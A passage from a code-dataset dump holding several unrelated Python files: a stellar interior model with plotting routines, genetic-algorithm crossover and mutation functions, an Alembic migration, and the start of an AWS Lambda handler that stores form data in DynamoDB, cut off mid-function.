\n\n\t\t\"\"\"\n\n\t\t#setting the last itteration\n\t\ti_end = n\n\n\t\t#creating empty arrays for each parameter\n\t\tr = np.zeros(n)\t\t\t\t\t\t\t\t\t\t\t\t\n\t\trho = np.zeros(n)\t\n\t\tP = np.zeros(n)\n\t\tL = np.zeros(n)\n\t\tT = np.zeros(n)\n\t\tm = np.zeros(n)\t\n\t\tKappas = np.zeros(n)\n\t\tepsilon = np.zeros(n)\t\t\n\t\tdel_Star = np.zeros(n)\t\n\t\tdel_ad = np.zeros(n)\n\t\tdel_Stable = np.zeros(n)\n\t\tFlux_Rad = np.zeros(n)\t\t\t\t\t\t\t \t\t\n\t\tFlux_Conv = np.zeros(n)\n\t\tPP1 = np.zeros(n)\t\t\t\t\t\t\t \t\t\n\t\tPP2 = np.zeros(n)\t\t\t\t\t\t\t \t\t\n\t \t\n\t \t#setting the initial conditions\n\t\tr[0] = r0\t\t\t\t\t\t\t\t\t\t\n\t\trho[0] = rho0\n\t\tL[0] = L0\n\t\tT[0] = T0\n\t\tm[0] = m0\n\t\tP[0] = self.Pressure(rho[0], T[0])\n\t\tKappas[0] = kappa0\n\n\t\t#initial value for the gradients\t\n\t\tdel_ad[0] = self.del_AD(P[0], T[0], rho[0])\n\t\tdel_Stable[0] = self.del_Stable(m[0], Kappas[0], L[0], rho[0], T[0], r[0])\n\n\t\t#Using the Forward Euler integration method, as it is sufficient for our analysis.\n\t\tfor i in range(0, n-1):\n\n\t\t\t#the case where we dont have convection\n\t\t\tif del_Stable[i] < self.del_ad:\n\n\t\t\t\t#if no convection, then temperature gradient of the star is = del_stable\n\t\t\t\tdel_Star[i] = del_Stable[i]\n\n\t\t\t\t#calculating the flux in the star\n\t\t\t\tFlux_Rad[i] = self.Flux_Rad(L[i],r[i])\t\t\t\t\t\t\t\t\t\t\t#radiative flux\n\n\t\t\t\tFlux_Conv[i] = 0\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#convective flux\n\n\t\t\t\t#setting dTdm for the case of no convection\n\t\t\t\tdTdm = self.dTdm(Kappas[i], L[i], r[i], T[i])\n\n\n\t\t\t#the case where we have convection\n\t\t\telse:\n\n\t\t\t\t#calculating temperature gradient when there is convection\n\t\t\t\tdel_Star[i] = self.del_Star(T[i], rho[i], Kappas[i], m[i], r[i], L[i])\t\t\t\t\n\n\t\t\t\t#calculating the flux in the star\n\t\t\t\tFlux_Rad[i] = self.Flux_Rad_Conv(T[i], Kappas[i], rho[i], m[i], r[i], L[i])\t\t#radiative flux\n\n\t\t\t\tFlux_Conv[i] = self.Flux_Conv(rho[i], T[i], m[i], r[i], Kappas[i], L[i])\t\t#convective flux\t\t\n\n\t\t\t\t#setting dTdm for the case when there is convection\n\t\t\t\tdTdm = self.dTdm_Conv(T[i], P[i], r[i], m[i], rho[i], Kappas[i], L[i])\n\n\n\t\t\t#calculating a new steplength dm for each iteration\n\t\t\tdm = self.dm_Var_conv(r[i],P[i],L[i],T[i],rho[i],Kappas[i],m[i], dTdm, p)\t\n\n\t\t\t#updating all parameters\n\t\t\tr[i+1] = r[i] + self.drdm(rho[i], r[i]) * dm\n\n\t\t\tP[i+1] = P[i] + self.dPdm(r[i], m[i]) * dm\n\n\t\t\tT[i+1] = T[i] + dTdm * dm\n\n\t\t\tL[i+1] = L[i] + self.dLdm(rho[i], T[i]) * dm\n\n\t\t\trho[i+1] = self.Density(P[i+1], T[i+1])\n\n\t\t\tKappas[i+1] = self.Kappa(rho[i+1], T[i+1])\n\n\t\t\tepsilon[i] = self.eps(rho[i],T[i])\n\n\t\t\tPP1[i] = self.PPIandPPII(rho[i],T[i])[0]\n\n\t\t\tPP2[i] = self.PPIandPPII(rho[i],T[i])[1]\n\n\t\t\tm[i+1] = m[i] + dm\n\n\t\t\tdel_Stable[i+1] = self.del_Stable(m[i+1], Kappas[i+1], L[i+1], rho[i+1], T[i+1], r[i+1])\n\n\t\t\tdel_ad[i+1] = self.del_AD(P[i+1], T[i+1], rho[i+1])\n\n\n\n\t\t\t#finding the index where we hit the center which will be the end iteration (only used for constant dm)\n\t\t\tif m[i] <= 0:\n\t\t\t\ti_end = i\n\t\t\t\tbreak\n\n\n\t\t#returning the desired paramteres which are to be studied\n\t\treturn r, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv\n\n\n\n\tdef CrossSection(self, n, r0, rho0, L0, T0, m0, Kappa0, Title, Figname, p):\n\n\t\t\"\"\"\n\t\tSubroutine that plotts a cross section of our star.\n\n\t\t\"\"\"\t\t\n\n\t\tr, P, 
T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad ,del_Star, Flux_Rad, Flux_Conv \\\n\t\t= self.Var_Integration_Conv(n, r0, rho0, L0, T0, m0, Kappa0, p)\n\n\t\t#printing information about the produced star\n\t\tself.InfoPrint(r,m,L,T,Flux_Conv,Flux_Rad,r0,m0,L0)\n\n\t\tR_values = r/r0\n\t\tL_values = L/L0\n\t\tF_C_list = Flux_Conv[:-1]/(Flux_Conv[:-1] + Flux_Rad[:-1])\n\t\tR0 = 1\n\t\tN = len(R_values)\n\t\tshow_every = 50\n\t\tcore_limit = 0.995\n\n\t\tplt.figure()\n\t\tfig = plt.gcf() \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# get current figure\n\t\tax = plt.gca() \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# get current axis\n\t\trmax = 1.2*R0\n\t\tax.set_xlim(-rmax,rmax)\n\t\tax.set_ylim(-rmax,rmax)\n\t\tax.set_aspect('equal')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# make the plot circular\n\t\tj = show_every\n\n\t\tfor k in range(0, N-1):\n\t\t\tj += 1\n\n\t\t\tif j >= show_every:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# don't show every step - it slows things down\n\n\t\t\t\tif(L_values[k] > core_limit):\t\t\t\t\t\t\t\t\t\t\t\t# outside core\n\n\t\t\t\t\tif(F_C_list[k] > 0.0):\t\t\t\t\t\t\t\t\t\t\t\t\t# convection\n\t\t\t\t\t\tcircR = plt.Circle((0,0),R_values[k],color='red',fill=False)\n\t\t\t\t\t\tax.add_artist(circR)\n\n\t\t\t\t\telse:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# radiation\n\t\t\t\t\t\tcircY = plt.Circle((0,0),R_values[k],color='yellow',fill=False)\n\t\t\t\t\t\tax.add_artist(circY)\n\t\t\t\telse:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# inside core\n\n\t\t\t\t\tif(F_C_list[k] > 0.0):\t\t\t\t\t\t\t\t\t\t\t\t\t# convection\n\t\t\t\t\t\tcircB = plt.Circle((0,0),R_values[k],color='blue',fill = False)\n\t\t\t\t\t\tax.add_artist(circB)\n\t\t\t\t\telse:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# radiation\n\n\t\t\t\t\t\tcircC = plt.Circle((0,0),R_values[k],color='cyan',fill = False)\n\t\t\t\t\t\tax.add_artist(circC)\n\t\t\t\tj = 0\n\n\t\tcircR = plt.Circle((2*rmax,2*rmax),0.1*rmax,color='red',fill=True)\t\t\t\t\t# These are for the legend (drawn outside the main plot)\n\t\tcircY = plt.Circle((2*rmax,2*rmax),0.1*rmax,color='yellow',fill=True)\n\t\tcircC = plt.Circle((2*rmax,2*rmax),0.1*rmax,color='cyan',fill=True)\n\t\tcircB = plt.Circle((2*rmax,2*rmax),0.1*rmax,color='blue',fill=True)\n\t\tax.legend([circR, circY, circC, circB], ['Convection outside core', 'Radiation outside core', \\\n\t\t'Radiation inside core', 'Convection inside core']) \t\t\t\t\t\t\t\t# only add one (the last) circle of each colour to legend\n\t\tplt.legend(loc=2)\n\t\tplt.xlabel('')\n\t\tplt.ylabel('')\n\t\tplt.title(Title)\t\n\t\tplt.savefig(Figname)\t\n\t\tplt.show()\n\n\n\tdef InfoPrint(self,r,m,L,T,Flux_Conv,Flux_Rad,r0,m0,L0):\n\n\t\t\"\"\"\n\t\tThis function prints useful information about the produced star.\n\n\t\t\"\"\"\n\n\t\t#finding which iteration satisfies our luminosity < 0.995 goal\n\t\tL_it = (np.where(L>= 0.995*np.max(L)))[-1][-1]\n\n\t\t#finding which iterations the the energy flux is dominated by convection\n\t\tFlux_it = np.where(np.diff(np.sign(Flux_Rad - Flux_Conv)) != 0)[-1][0]\n\n\t\t#the core radius is simply the radius at this iteration\n\t\tcore_radius = r[L_it]/r0\n\n\t\t#and the convection zone radius\n\t\tconzone_radius = r[Flux_it]/r0\n\n\t\t#printing the different attributes of our star\n\t\tprint(\"Final Mass: %g\" %(m[-1]/m0))\n\t\tprint(\"Final Radius: %g\" %(r[-1]/r0))\n\t\tprint(\"Final Luminosity: %g\" %(L[-1]/L0))\n\t\tprint(\"Core Radius: %g\" %(core_radius))\n\t\tprint(\"Convection Zone Radius: %g\" %(1-conzone_radius))\n\t\tprint(\"Mass Inside Core: %g\" %(m[L_it]/m0))\n\t\tprint(\"Core temperature: 
%g\" %(T[-1]))\n\n\t\tBot_it = np.where(T >= 52868)[-1][-1]\n\t\t# print(np.where(T >= 52868))\n\t\tBot = r[2433]\n\t\tprint(\"Bot Temp: %g\" %(Bot))\n\n\tdef SanityCheck_Values(self):\n\n\t\t\"\"\"\n\t\tTesting that the program where we for one itteration with specific initial values,\n\t\tand printing the results and matching them to a given solution.\n\n\t\t\"\"\"\n\n\t\t##resolution parameters, only 1 itteration (starts from 0 to n-1)\n\t\tn = int(2)\n\t\tp = 1e-3\n\n\t\t#using a prechosen set of initial values in the middle of the convection zone\n\t\tr0 = 0.84*self.R_sol\t\t\t\t\t\t\t\t\t\t\n\t\trho0 = 55.9\t\n\t\tL0 = self.L_sol\n\t\tT0 = 0.9*1e6\n\t\tm0 = 0.99*self.M_sol\n\t\tP0 = self.Pressure(rho0, T0)\n\t\tKappa0 = 3.98\n\n\t\t#solving the differential equations \n\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t= self.Var_Integration_Conv(n, r0, rho0, L0, T0, m0, Kappa0, p)\n\n\t\t#printing the different sanity check quantities\n\t\tprint(\"Sanity Check:\")\n\t\tprint(\"del_Stable = %g\" %del_Stable[0])\t\t\n\t\tprint(\"del_ad = %g\" %self.del_AD(P0, T0, rho0))\n\t\tprint(\"H_p = %g\" %self.H_p(T0,m0,r0))\n\t\tprint(\"xi = %g\" %self.xi_Solver(T0, rho0, Kappa0, m0, r0, L0))\n\t\tprint(\"U = %g\" %self.U)\n\t\tprint(\"del_Star = %g\" %del_Star[0])\n\t\tprint(\"v = %g\" %self.Vel_parcel(m0, r0, T0, rho0, Kappa0, L0))\n\t\tprint(\"F_C / (F_C + F_R) = %g\" %(Flux_Conv[0]/(Flux_Conv[0] + Flux_Rad[0])))\n\t\tprint(\"F_R / (F_C + F_R) = %g\" %(Flux_Rad[0]/(Flux_Conv[0] + Flux_Rad[0])))\n\n\n\n\tdef SanityCheck_Plot(self, mode):\n\n\t\t\"\"\"\n\t\tPlotting the sanity check figure for the gradients.\n\n\t\t\"\"\"\n\n\t\t#initial conditions\n\t\tr0 = self.R_s\n\t\trho0 = self.rho_s\n\t\tL0 = self.L_s\n\t\tT0 = self.T_s\n\t\tm0 = self.M_s\n\t\tKappa0 = self.Kappa(rho0, T0)\n\n\t\t#Plotting the gradient sanity figure\n\t\tif mode == \"Gradients\":\n\n\n\t\t\t#resolution parameters\n\t\t\tn = int(4e4)\n\t\t\tp = 1e-3\t\n\n\t\t\t#solving the differential equations \n\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad ,del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t= self.Var_Integration_Conv(n, r0, rho0, L0, T0, m0, Kappa0, p)\t\n\n\n\t\t\t#plotting the gradients as a function of radius\n\t\t\tplt.title(\"Sanity Check Temperature Gradients\")\n\t\t\tplt.semilogy(r/self.R_s, del_Stable, label = r\"$\\nabla_{Stable}$\",color= \"crimson\")\n\t\t\tplt.semilogy(r/self.R_s, del_Star, label = r\"$\\nabla^*$\", color = \"royalblue\")\n\t\t\tplt.semilogy(r/self.R_s, del_ad, label = r\"$\\nabla_{ad}$\", color = \"mediumseagreen\")\n\t\t\tplt.grid(linewidth = 0.5, linestyle= \"--\")\n\t\t\tplt.legend()\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"Gradients\")\n\t\t\tplt.savefig(\"SanityPlot.pdf\")\n\t\t\tplt.show()\n\n\n\t\t#Plotting the cross section sanity figure\n\t\tif mode == \"CrossSection\":\n\n\n\t\t\t#resolution parameters\n\t\t\tn = int(2.95e4)\n\t\t\tp = 1e-3\n\n\t\t\t#specifics to cross section subfunction\n\t\t\tTitle = \"Sanity Check Cross-Section\"\n\t\t\tFigname = \"SanityCrossSection.pdf\"\n\n\t\t\t#plotting the cross section\n\t\t\tself.CrossSection(n, r0, rho0, L0, T0, m0, Kappa0, Title, Figname, p)\n\n\t\t#if none of the above is selected\n\t\telse:\n\n\t\t\tprint(\"Please select either 'Gradients' or 'CrossSection' as input argument.\")\n\n\n\n\tdef VaryingInitiParam(self,parameter):\n\n\t\t\"\"\"\n\t\tHere we try out different initial parameters to see which results in larger \n\t\tconvection zones. 
\n\n\t\t\"\"\"\n\n\t\t#resolution parameters\n\t\tn = int(1e4)\n\t\tp = 1e-2\n\n\n\t\t#Varying Radius\n\t\tif parameter == \"Radius\":\n\n\t\t\t#Inital values and labels\n\t\t\tr0 =[self.R_s/3, self.R_s/2, self.R_s, 2*self.R_s, 3*self.R_s, 4*self.R_s, 5*self.R_s]\n\t\t\tlabels_R = [\"1/3\", \"1/2\", \"1\", \"2\", \"3\", \"4\", \"5\"]\n\n\t\t\tfor i in range(len(r0)):\n\n\t\t\t\t#solving the differential equations \n\t\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t\t= self.Var_Integration_Conv(n, r0[i], self.rho_s, self.L_s, self.T_s, self.M_s, self.Kappa(self.rho_s, self.T_s), p)\n\n\t\t\t\t#plotting the figure\n\t\t\t\tplt.figure(1)\n\t\t\t\tplt.plot(r/r0[i], (Flux_Conv[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1])),label = \"%s$R_0$\"%labels_R[i])\n\t\t\t\tplt.title(r\"Convection for varying $R_0$\")\n\t\t\t\tplt.legend()\n\t\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\t\tplt.ylabel(\"$F_C/F_{tot}$\")\n\t\t\t\tplt.grid(linewidth=0.5)\n\t\t\t\tplt.xlim(0.85,1)\n\t\t\t\t# plt.savefig(\"Vary_R.pdf\")\n\t\t\t\n\t\t\tplt.show()\n\n\n\t\t#Varying Density\n\t\tif parameter == \"Density\":\n\n\t\t\t#Inital values and labels\n\t\t\t# rho0 =[self.rho_s, 5*self.rho_s, 15*self.rho_s, 35*self.rho_s, 80*self.rho_s, 120*self.rho_s, 200*self.rho_s]\n\t\t\t# labels_rho = [\"1\", \"5\", \"15\", \"35\", \"80\", \"120\", \"200\"]\n\n\t\t\trho0 =[self.rho_s/3, self.rho_s/2, self.rho_s, 2*self.rho_s, 3*self.rho_s, 4*self.rho_s, 5*self.rho_s]\n\t\t\tlabels_rho = [\"1/3\", \"1/2\", \"1\", \"2\", \"3\", \"4\", \"5\"]\n\n\t\t\tfor i in range(len(rho0)):\n\n\t\t\t\t#solving the differential equations \n\t\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t\t= self.Var_Integration_Conv(n, self.R_s, rho0[i], self.L_s, self.T_s, self.M_s, self.Kappa(rho0[i], self.T_s), p)\n\n\t\t\t\t#plotting the figure\n\t\t\t\tplt.figure(1)\n\t\t\t\tplt.plot(r[:-1]/self.R_s, (Flux_Conv[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1])),label = r\"%s$\\rho_0$\"%labels_rho[i])\n\t\t\t\tplt.title(r\"Convection for varying $\\rho_0$\")\n\t\t\t\tplt.legend()\n\t\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\t\tplt.ylabel(\"$F_C/F_{tot}$\")\n\t\t\t\tplt.grid(linewidth=0.5)\n\t\t\t\tplt.xlim(0.85,1)\n\t\t\t\t# plt.savefig(\"Vary_rho.pdf\")\n\t\t\t\n\t\t\tplt.show()\n\n\n\t\t#Varying Radius\n\t\tif parameter == \"Temperature\":\n\n\t\t\t#Inital values and labels\n\t\t\tT0 =[self.T_s/3, self.T_s/2, self.T_s, 2*self.T_s, 3*self.T_s, 4*self.T_s, 5*self.T_s]\n\t\t\tlabels_T = [\"1/3\", \"1/2\", \"1\", \"2\", \"3\", \"4\", \"5\"]\n\n\t\t\tfor i in range(len(T0)):\n\n\t\t\t\t#solving the differential equations \n\t\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t\t= self.Var_Integration_Conv(n, self.R_s, self.rho_s, self.L_s, T0[i], self.M_s, self.Kappa(self.rho_s, T0[i]), p)\n\n\t\t\t\t#plotting the figure\n\t\t\t\tplt.figure(1)\n\t\t\t\tplt.plot(r[:-1]/self.R_s, (Flux_Conv[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1])),label = \"%s$T_0$\"%labels_T[i])\n\t\t\t\tplt.title(r\"Convection for varying $T_0$\")\n\t\t\t\tplt.legend()\n\t\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\t\tplt.ylabel(\"$F_C/F_{tot}$\")\n\t\t\t\tplt.grid(linewidth=0.5)\n\t\t\t\tplt.xlim(0.95,1)\n\t\t\t\t# plt.savefig(\"Vary_T.pdf\")\n\t\t\t\n\t\t\tplt.show()\n\n\t\t#if none of the above are selected\n\t\telse:\n\n\t\t\tprint(\"Please select either 'Radius', 'Density' or 'Temperature' as input argument.\")\n\n\n\tdef 
TestingParam(self):\n\n\t\t\"\"\"\n\t\tHere we look for the best parameter\n\n\t\t\"\"\"\n\n\t\t#resolution parameters\n\t\tn = int(1e4)\n\t\tp = 1e-2\n\n\t\t#scaling the initial values\n\t\tr_scale = 1.2\n\t\trho_scale = 150\n\t\tT_scale = 0.95\n\n\t\t#initial conditions of the star\n\t\tr0 = r_scale*self.R_s\n\t\trho0 = rho_scale*self.rho_s\n\t\tT0 = T_scale*self.T_s\n\t\tL0 = self.L_s\n\t\tm0 = self.M_s\n\t\tKappa0 = self.Kappa(rho0, T0)\n\n\t\t#setting title and figure name as input for the cross section function\n\t\tTitle = r\"$R_0 = 1.2\\cdot R_\\odot \\rho_0 = 150\\rho_0, T_0 = 0.95\\cdot T_0$\"\n\t\tFigname = \"random.pdf\"\n\n\t\t#plotting the cross section\n\t\tself.CrossSection(n, r0, rho0, L0, T0, m0, Kappa0, Title, Figname, p)\n\n\n\n\n\tdef FinalModel(self,mode):\n\n\t\t\"\"\"\n\t\tHere we can vary the initial parameters and study the resulting star.\n\n\t\t\"\"\"\n\t\t#scaling the initial values\n\t\tr_scale = 1.2\n\t\trho_scale = 150\n\t\tT_scale = 0.95\n\n\t\t#initial conditions of the star\n\t\tr0 = r_scale*self.R_s\n\t\trho0 = rho_scale*self.rho_s\n\t\tT0 = T_scale*self.T_s\n\t\tL0 = self.L_s\n\t\tm0 = self.M_s\n\t\tKappa0 = self.Kappa(rho0, T0)\n\n\t\t#resolution parameters\n\t\tn = int(1e4)\n\t\tp = 2.3e-3\n\n\t\tif mode == \"CrossSection\":\n\n\t\t\t#setting title and figure name as input for the cross section function\n\t\t\tTitle = \"Final Cross Section\"\n\t\t\tFigname = \"FinalStar.pdf\"\n\n\t\t\t#plotting the cross section\n\t\t\tself.CrossSection(n, r0, rho0, L0, T0, m0, Kappa0, Title, Figname, p)\n\n\n\t\tif mode == \"FinalModel\":\n\n\n\t\t\t#solving the differential equations \n\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t= self.Var_Integration_Conv(n, r0, rho0, L0, T0, m0, Kappa0, p)\n\n\t\t\t#printing usefull information about the star\n\t\t\tself.InfoPrint(r,m,L,T,Flux_Conv,Flux_Rad,r0,m0,L0)\n\n\n\t\t\t#ploting all variables as a function of radius instead of mass\n\t\t\tplt.figure(1)\n\t\t\tplt.plot(r/r0, L, label = \"$L(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Luminosity vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"L [J]\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"L_final.pdf\")\t\n\n\t\t\tplt.figure(2)\n\t\t\tplt.plot(r/r0, m, label = \"$M(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Mass vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"M [kg]\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"m_final.pdf\")\t\n\n\t\t\tplt.figure(3)\n\t\t\tplt.semilogy(r/r0, P, label = \"$P(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Pressure vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"$P [Pa]$\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"P_final.pdf\")\t\t\n\n\t\t\tplt.figure(4)\n\t\t\tplt.semilogy(r/r0, rho, label = r\"$\\rho(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Density vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(r\"$\\rho$ [kg/m^3]\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"rho_final.pdf\")\t\t\n\n\t\t\tplt.figure(5)\n\t\t\tplt.plot(r/r0, T, label = \"$T(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Temperature vs. 
radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"T [K]\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"T_final.pdf\")\t\t\n\n\t\t\tplt.figure(6)\n\t\t\tplt.plot(r[:-1]/r0, Flux_Conv[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1]), label = \"$F_C(R)/F_{tot}$\", color = \"royalblue\")\n\t\t\tplt.plot(r[:-1]/r0, Flux_Rad[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1]), label = \"$F_R(R)/F_{tot}$\", color = \"crimson\")\n\t\t\tplt.title(\"Flux vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"Flux Fractions\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"F_final.pdf\")\t\n\n\t\t\tplt.figure(7)\n\t\t\tplt.plot(r[100:-1]/r0, PP1[100:-1]/epsilon[100:-1], label = \"$\\epsilon_{PP1}/\\epsilon_{tot}$\", color = \"royalblue\")\n\t\t\tplt.plot(r[100:-1]/r0, PP2[100:-1]/epsilon[100:-1], label = \"$\\epsilon_{PP2}/\\epsilon_{tot}}$\", color = \"crimson\")\n\t\t\tplt.plot(r[100:-1]/r0, epsilon[100:-1]/epsilon[-2], label = \"$\\epsilon_{tot}}$\", color = \"mediumseagreen\")\n\t\t\tplt.title(\"$\\epsilon$ contribution along with $\\epsilon_{tot}$ vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"Energy Fractions\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5)\n\t\t\t# plt.savefig(\"E_final.pdf\")\t\n\n\t\t\tplt.figure(8)\n\t\t\tplt.title(\"Temperature Gradients vs. radius\")\n\t\t\tplt.semilogy(r/r0, del_Stable, label = r\"$\\nabla_{Stable}$\",color= \"crimson\")\n\t\t\tplt.semilogy(r/r0, del_ad, label = r\"$\\nabla_{ad}$\", color = \"mediumseagreen\")\n\t\t\tplt.semilogy(r/r0, del_Star, label = r\"$\\nabla^*$\", color = \"royalblue\")\n\t\t\tplt.grid(linewidth = 0.5, linestyle= \"--\")\n\t\t\tplt.legend()\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"Gradients\")\n\t\t\tplt.savefig(\"Grad_finalx.pdf\")\t\n\n\t\t\tplt.show()\n\n\n\nif __name__ == \"__main__\":\n\n\t\"\"\"\n\tTesting the program. 
Stuff written here will not be imported along with the class into other files.\n\n\t\"\"\"\n\n\tStellar = StarModel()\n\t# Stellar.SanityCheck_Values()\n\n\t# Stellar.SanityCheck_Plot(\"Gradients\")\n\t# Stellar.SanityCheck_Plot(\"CrossSection\")\n\n\t# Stellar.VaryingInitiParam(\"Density\")\n\n\t# Stellar.TestingParam()\n\n\t# Stellar.FinalModel(\"FinalModel\")\n\tStellar.FinalModel(\"CrossSection\")\n\n\n\n","sub_path":"Project2/SanProject2.py","file_name":"SanProject2.py","file_ext":"py","file_size_in_byte":22880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"416179016","text":"import random\nfrom Task.Chromosome import Chromosome\n\n\n# Class to represent biological processes\nclass BiologicalProcessManager:\n\t\t'''\n\t\t\tCrossover Function\n\n\t\t\t- The process of One-Point crossover is exercised in this function.\n\t\t'''\n\t\tdef crossover(crossover_rate, parentOne, parentTwo):\n\t\t\trandom_probability = random.uniform(0, 1)\n\t\t\tif random_probability > crossover_rate:\n\t\t\t\tpivot = random.randint(0, len(parentOne.genotype_representation)-1)\n\t\t\t\tchild_one_genotype = parentOne.genotype_representation[:pivot] + parentTwo.genotype_representation[pivot:]\n\t\t\t\tchild_two_genotype = parentTwo.genotype_representation[:pivot] + parentOne.genotype_representation[pivot:]\n\t\t\t\tchild_one = Chromosome(parentOne.alpha, parentOne.number_of_edge, parentOne.number_of_user, parentOne.pre_tf, child_one_genotype)\n\t\t\t\tchild_two = Chromosome(parentOne.alpha, parentOne.number_of_edge, parentOne.number_of_user, parentOne.pre_tf, child_two_genotype)\n\t\t\t\treturn child_one, child_two\n\t\t\telse:\n\t\t\t\treturn parentOne, parentTwo\n\n\n\t\t'''\n\t\t\tMutation function\n\n\t\t\t- The process of Random Resetting is exercised in this function.\n\t\t'''\n\t\tdef mutate(mutation_rate, child, candidates):\n\t\t\tfor index, position in enumerate(child.genotype_representation):\n\t\t\t\trandom_probability = random.uniform(0, 1)\n\t\t\t\t'''\n\t\t\t\t\t(Random Resetting) \"Flip\" the position with another knapsack if probability < mutation_rate\n\t\t\t\t'''\n\t\t\t\tif random_probability > mutation_rate:\n\t\t\t\t\tchild.genotype_representation[index] = candidates[index][random.randint(0, len(candidates)-1)]\n\n\n\n\n\n","sub_path":"Edge Computing/Task/genetic_toolkit.py","file_name":"genetic_toolkit.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"584411496","text":"\"\"\"added user last seen\n\nRevision ID: ad752103553e\nRevises: 9b4def72bca2\nCreate Date: 2020-11-14 16:04:38.922512\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ad752103553e'\ndown_revision = '9b4def72bca2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('last_seen', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('user', 'last_seen')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ad752103553e_added_user_last_seen.py","file_name":"ad752103553e_added_user_last_seen.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222122886","text":"import json\nimport boto3\nimport urllib.parse\nimport time\nimport decimal\nimport os\n\n# DynamoDBオブジェクト\ndynamodb = boto3.resource('dynamodb')\n\n# 連番を更新して返す関数\ndef next_seq(table,tablename):\n response = table.update_item(\n Key={\n 'tablename' : tablename\n },\n UpdateExpression=\"set seq = seq + :val\",\n ExpressionAttributeValues= {\n ':val' : 1\n },\n ReturnValues='UPDATED_NEW'\n )\n return response['Attributes']['seq']\n\ndef lambda_handler(event, context):\n try:\n # シーケンスデータを得る\n seqtable = dynamodb.Table('sequence')\n nextseq = next_seq(seqtable, 'user')\n\n # フォームに入力されたデータを得る\n param = urllib.parse.parse_qs(event['body'])\n username = param['username'][0]\n email = param['email'][0]\n\n # クライアントのIPを得る\n host = event['requestContext']['identity']['sourceIp']\n\n # 現在のUNIXタイムスタンプを得る\n now = time.time()\n\n\n # 署名付きURLを作る\n s3 = boto3.client('s3')\n url = s3.generate_presigned_url(\n ClientMethod = 'get_object',\n Params = {'Bucket' : os.environ['bucketname'], 'Key' : 'test.jpg'},\n ExpiresIn = 48 * 60 * 60,\n 